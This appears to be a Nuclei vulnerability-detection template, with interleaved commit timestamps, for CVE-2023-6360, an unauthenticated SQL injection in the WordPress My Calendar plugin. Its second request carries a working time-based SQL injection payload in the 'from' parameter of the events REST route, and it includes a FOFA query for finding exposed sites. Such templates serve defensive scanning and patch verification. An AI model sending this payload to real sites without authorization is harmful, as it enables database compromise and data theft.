2024-01-31 11:07:22 +00:00
id : CVE-2023-6360
info :
name : WordPress My Calendar <3.4.22 - Unauthenticated SQL Injection
2024-02-01 10:17:48 +00:00
author : xxcdd
2024-01-31 11:07:22 +00:00
severity : high
description : |
WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.
impact : |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, which could lead to data theft, database compromise, or further attack vectors.
remediation : Upgrade to My Calendar plugin version 3.4.22 or later.
reference :
- https://www.tenable.com/security/research/tra-2023-40
- https://www.joedolson.com/2023/11/my-calendar-3-4-22-security-release/
- https://wordpress.org/plugins/my-calendar/
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-6360
cwe-id : CWE-89
cpe : cpe:2.3:a:joedolson:my_calendar:*:*:*:*:*:wordpress:*:*
metadata :
fofa-query : '"wordpress" && body="wp-content/plugins/my-calendar"'
2024-02-01 10:17:48 +00:00
verified : true
tags : cve,cve2023,sqli,wordpress,wpscan,wp-plugin,my-calendar
flow : http(1) && http(2)
2024-01-31 11:07:22 +00:00
http :
- method : GET
path :
2024-02-01 10:17:48 +00:00
- "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"
matchers :
- type : word
internal : true
words :
- 'My Calendar'
- method : GET
path :
2024-01-31 11:07:22 +00:00
- "{{BaseURL}}/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a"
2024-02-01 10:17:48 +00:00
2024-01-31 11:07:22 +00:00
matchers :
- type : dsl
dsl :
2024-02-01 10:17:48 +00:00
- 'contains(header, "application/json")'
- 'contains(body, "[]")'
- 'duration >= 6'
2024-01-31 11:07:22 +00:00
condition : and